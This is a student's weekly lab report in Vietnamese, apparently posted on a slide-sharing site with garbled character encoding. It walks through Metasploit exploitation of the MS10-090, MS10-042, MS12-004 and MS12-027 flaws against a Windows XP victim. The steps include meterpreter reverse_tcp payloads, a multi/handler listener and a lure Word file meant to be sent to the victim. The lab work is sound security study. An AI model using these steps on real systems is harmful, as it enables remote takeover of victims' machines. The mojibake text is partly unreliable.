際際滷

際際滷Share a Scribd company logo
BO CO TU畉N 1
SVTH: L CNG H畉U
GVHD: TH畉Y V 畛 TH畉NG
TPHCM, ngy 28 th叩ng 06 nm 2014
Trong tu畉n v畛a r畛i em 達 hon thnh 動畛c c叩c v畉n 畛 sau:
 Ci 畉t h畛 i畛u hnh Backtrack 5R3.
 Khai th叩c l畛i MS10-090 l畛i c畛a mshtml trong IE.
 Khai th叩c l畛i MS10-042 l畛 h畛ng c畛a CSS trong Help Center c畛a IE.
 Khai th叩c l畛i MS12-004 khai th叩c l畛i c畛a file MIDI trong IE.
 Khai th叩c l畛i MS12-027.
1. Khai th叩c l畛i MS10-090
M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim).
B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack.
B動畛c 2: d湛ng l畛n search ms10-090 畛 t狸m ki畉m module c畛a ms10-090. Sau 坦
d湛ng c但u l畛nh use exploit/windows/browser/ms10_090_ie_css_clip
B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i.
B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh
Set SRVHOST [IP c畛a m叩y Backtrack]
Set LHOST [IP c畛a m叩y Backtrack]
Set payload windows/meterpreter/reverse_tcp
B動畛c 5: d湛ng l畛nh exploit 畛 t畉o ra m畛t 動畛ng d畉n.
Khi m叩y XP truy c畉p vo 動畛ng d畉n tr棚n th狸 s畉 b畛 ng動畛i t畉n c担ng i畛u khi畛n.
Link Youtube: http://youtu.be/2xeIlrODJQQ
2. Khai th叩c l畛i MS10-042
M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim).
B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack.
B動畛c 2: d湛ng l畛n search ms10-042 畛 t狸m ki畉m module c畛a ms10-042.
Sau 坦 d湛ng c但u l畛nh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec
B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i.
B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh
Set SRVHOST [IP c畛a m叩y Backtrack]
Set LHOST [IP c畛a m叩y Backtrack]
Set payload windows/meterpreter/reverse_tcp
B動畛c 5: exploit
Khi m叩y XP truy c畉p vo 畛a ch畛 do m叩y Backtrack t畉o ra th狸 ng動畛i d湛ng XP s畉 b畛
ng動畛i t畉n c担ng i畛u khi畛n.
Link Youtube: https://www.youtube.com/watch?v=mSWi3Vsq3eQ
3. Khai th叩c l畛i MS12-004
M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim).
B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack.
B動畛c 2: d湛ng l畛n search ms12_004_midi 畛 t狸m ki畉m module c畛a ms12-004.
Sau 坦 d湛ng c但u l畛nh use exploit/windows/browser/ms12_004_midi
B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i.
B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh
Set SRVHOST [IP c畛a m叩y Backtrack]
Set LHOST [IP c畛a m叩y Backtrack]
Set payload windows/meterpreter/reverse_tcp
B動畛c 5: d湛ng l畛nh exploit 畛 t畉o ra m畛t 動畛ng d畉n.
Khi m叩y XP truy c畉p vo 動畛ng d畉n tr棚n th狸 s畉 b畛 ng動畛i t畉n c担ng i畛u khi畛n.
Link Youtube:http://youtu.be/Sot_U8CFXCw
4. Khai th叩c l畛i MS12-027
Khai th叩c l畛 h畛ng c畛a file word tr棚n ch動董ng tr狸nh Microsoft Office 2007
M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim).
B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack.
B動畛c 2: d湛ng l畛n search ms12_027 畛 t狸m ki畉m module c畛a ms12-027.
Sau 坦 d湛ng c但u l畛nh use exploit/windows/fileformat/ms12_027_mscomctl_bof
B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i.
B動畛c 4: m狸nh ch畛nh t棚n file cho h畉p d畉n b畉ng l畛nh
Set FILENAME baocao.doc
B動畛c 5: thi畉t l畉p c叩c thu畛c t鱈nh
Set LHOST [IP c畛a m叩y Backtrack]
Set LPORT 4443
Set payload windows/meterpreter/reverse_tcp
B動畛c 6: exploit 畛 t畉o file virus g畛i cho n畉n nh但n
Th担ng th動畛ng file ny 動畛c t畉o t畉i 動畛ng d畉n /root/.msf4/local
Copy file ny ra Desktop m叩y t畉n c担ng
cp /root/.msf4/local/baocao.doc /root/Desktop/
B動畛c 7: Thi畉t l畉p Multi Handler 畛 i畛u khi畛n m叩y n畉n nh但n
use exploit/multi/handler
v thi畉t l畉p port gi畛ng nh動 khi n達y
Cu畛i c湛ng ta exploit 畛 i畛u khi畛n victim
Link Youtube:http://youtu.be/Ertetn6vdr0

More Related Content

Bao cao tuan 1

  • 1. BO CO TU畉N 1 SVTH: L CNG H畉U GVHD: TH畉Y V 畛 TH畉NG TPHCM, ngy 28 th叩ng 06 nm 2014 Trong tu畉n v畛a r畛i em 達 hon thnh 動畛c c叩c v畉n 畛 sau: Ci 畉t h畛 i畛u hnh Backtrack 5R3. Khai th叩c l畛i MS10-090 l畛i c畛a mshtml trong IE. Khai th叩c l畛i MS10-042 l畛 h畛ng c畛a CSS trong Help Center c畛a IE. Khai th叩c l畛i MS12-004 khai th叩c l畛i c畛a file MIDI trong IE. Khai th叩c l畛i MS12-027. 1. Khai th叩c l畛i MS10-090 M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim). B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack. B動畛c 2: d湛ng l畛n search ms10-090 畛 t狸m ki畉m module c畛a ms10-090. Sau 坦 d湛ng c但u l畛nh use exploit/windows/browser/ms10_090_ie_css_clip B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i. B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh Set SRVHOST [IP c畛a m叩y Backtrack] Set LHOST [IP c畛a m叩y Backtrack] Set payload windows/meterpreter/reverse_tcp B動畛c 5: d湛ng l畛nh exploit 畛 t畉o ra m畛t 動畛ng d畉n. Khi m叩y XP truy c畉p vo 動畛ng d畉n tr棚n th狸 s畉 b畛 ng動畛i t畉n c担ng i畛u khi畛n. Link Youtube: http://youtu.be/2xeIlrODJQQ
  • 2. 2. Khai th叩c l畛i MS10-042 M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim). B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack. B動畛c 2: d湛ng l畛n search ms10-042 畛 t狸m ki畉m module c畛a ms10-042. Sau 坦 d湛ng c但u l畛nh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i. B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh Set SRVHOST [IP c畛a m叩y Backtrack] Set LHOST [IP c畛a m叩y Backtrack] Set payload windows/meterpreter/reverse_tcp B動畛c 5: exploit Khi m叩y XP truy c畉p vo 畛a ch畛 do m叩y Backtrack t畉o ra th狸 ng動畛i d湛ng XP s畉 b畛 ng動畛i t畉n c担ng i畛u khi畛n. Link Youtube: https://www.youtube.com/watch?v=mSWi3Vsq3eQ 3. Khai th叩c l畛i MS12-004 M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim). B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack. B動畛c 2: d湛ng l畛n search ms12_004_midi 畛 t狸m ki畉m module c畛a ms12-004. Sau 坦 d湛ng c但u l畛nh use exploit/windows/browser/ms12_004_midi B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i. B動畛c 4: thi畉t l畉p c叩c thu畛c t鱈nh Set SRVHOST [IP c畛a m叩y Backtrack] Set LHOST [IP c畛a m叩y Backtrack] Set payload windows/meterpreter/reverse_tcp
  • 3. B動畛c 5: d湛ng l畛nh exploit 畛 t畉o ra m畛t 動畛ng d畉n. Khi m叩y XP truy c畉p vo 動畛ng d畉n tr棚n th狸 s畉 b畛 ng動畛i t畉n c担ng i畛u khi畛n. Link Youtube:http://youtu.be/Sot_U8CFXCw 4. Khai th叩c l畛i MS12-027 Khai th叩c l畛 h畛ng c畛a file word tr棚n ch動董ng tr狸nh Microsoft Office 2007 M担i tr動畛ng chu畉n b畛 g畛m m叩y Backtrack (m叩y t畉n c担ng) v m叩y XP (victim). B動畛c 1: kh畛i 畛ng metasploit b畉ng c但u l畛nh msfcosole tr棚n m叩y Backtrack. B動畛c 2: d湛ng l畛n search ms12_027 畛 t狸m ki畉m module c畛a ms12-027. Sau 坦 d湛ng c但u l畛nh use exploit/windows/fileformat/ms12_027_mscomctl_bof B動畛c 3: d湛ng l畛nh show options 畛 xem c叩c thu畛c t鱈nh c畛a m達 l畛i. B動畛c 4: m狸nh ch畛nh t棚n file cho h畉p d畉n b畉ng l畛nh Set FILENAME baocao.doc B動畛c 5: thi畉t l畉p c叩c thu畛c t鱈nh Set LHOST [IP c畛a m叩y Backtrack] Set LPORT 4443 Set payload windows/meterpreter/reverse_tcp B動畛c 6: exploit 畛 t畉o file virus g畛i cho n畉n nh但n Th担ng th動畛ng file ny 動畛c t畉o t畉i 動畛ng d畉n /root/.msf4/local Copy file ny ra Desktop m叩y t畉n c担ng cp /root/.msf4/local/baocao.doc /root/Desktop/ B動畛c 7: Thi畉t l畉p Multi Handler 畛 i畛u khi畛n m叩y n畉n nh但n use exploit/multi/handler v thi畉t l畉p port gi畛ng nh動 khi n達y Cu畛i c湛ng ta exploit 畛 i畛u khi畛n victim